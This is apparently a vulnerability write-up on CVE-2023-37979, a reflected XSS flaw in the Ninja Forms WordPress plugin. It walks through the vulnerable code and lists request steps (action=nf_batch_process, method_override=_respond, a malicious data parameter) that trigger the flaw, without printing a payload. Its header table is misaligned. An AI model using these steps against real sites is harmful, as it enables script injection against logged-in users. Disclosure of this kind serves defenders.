CVE-2023-37979: WordPress Authenticated XSS in Ninja-forms Plugin
CVE ID | CVSS Score | Discovered | Affected Plugin | Vendor | Vulnerability Type |
---|---|---|---|---|---|
CVE-2023-37979 | 27/07/2023 | WordPress | Ninja-forms | Reflected XSS |
Ninja Forms wordpress plugin
The Ninja Forms plugin is a popular tool for creating forms on WordPress websites. Many people use it, with over 800,000 active installations. However, there is a security issue called Cross-Site Scripting (XSS) that needs to be taken care of.
Let's Exploit
How Does the Exploit Work?
The exploit uses a particular part of the request that the Ninja Forms plugin sends to a file called /wp-admin/admin-ajax.php
. In this request, there are different pieces of information, and one of them is called "action." When this "action" is set to "nf_batch_process," it activates some functions that can cause a Cross-Site Scripting (XSS) attack. Now, let's take a closer look at how this process works:
In the code, there is a condition that checks for two things: first, the request method must be POST, and second, there should be a parameter called method_override
in the request. When you send special POST requests with the method_override
parameter, it allows you to explore more possibilities and do different things.
Based on the information provided earlier, we found an action
parameter that leads to nf_batch_process
. Now, we are looking into the includes\AJAX\REST\BatchProcess.php file, where we came across a function called get_request_data
. Inside this function, there is another if
condition that checks for the presence of a data
parameter in the request. If this parameter exists, the function creates a data key within the $request_data
array and directly assigns the value of the data
parameter to it, without properly cleaning or validating it. This lack of sanitation could potentially introduce security risks.
In the include\Abstracts\Controller.php
file, there is a function called _respond
that performs various checks. One of these checks ensures that the data
parameter is not empty and goes through a series of if
conditions that must be satisfied. The function then puts all the data into the response
variable.
The problem arises from the fact that we assigned a value to the data
parameter when we executed includes\AJAX\REST\BatchProcess.php. As mentioned earlier, this data is not sanitized, meaning it may contain harmful code, such as an XSS payload. If a malicious user sends such harmful data to the nf_batch_process
action, it can lead to an XSS attack.
Based on the information provided, here's how we can exploit the XSS vulnerability in the Ninja Forms WordPress plugin:
- We start by sending a request to the
/wp-admin/admin-ajax.php
endpoint. - In the request, we change the value of the
action
parameter tonf_batch_process
. - Additionally, we include the
method_override
parameter in the request and set it to_respond
. - We then add the
data
parameter to the request and set its value to a malicious XSS payload.
When the server responds to this request, the response will contain the malicious XSS payload. The response's content type is set to text/html
, so the web browser will interpret it as HTML content and execute the embedded malicious script. This can lead to harmful consequences if a user unknowingly triggers the XSS attack while interacting with the affected page.
The response to this request contains a harmful XSS payload, and the response's content type is set to text/html
. Consequently, when the response is received, the web browser executes the malicious payload, leading to potential security risks and compromising the user's browsing experience.
When a user with proper authentication visits the malicious page, it triggers an XSS attack in their web browser.
Exploit for CVE-2023-37979
If you are looking for an exploit related to the CVE-2023-37979 vulnerability, you can download it from the provided link: CVE-2023-37979. However, please note that using exploits without proper authorization may be illegal and unethical. It is essential to use such tools responsibly and only on systems you own or have explicit permission to test.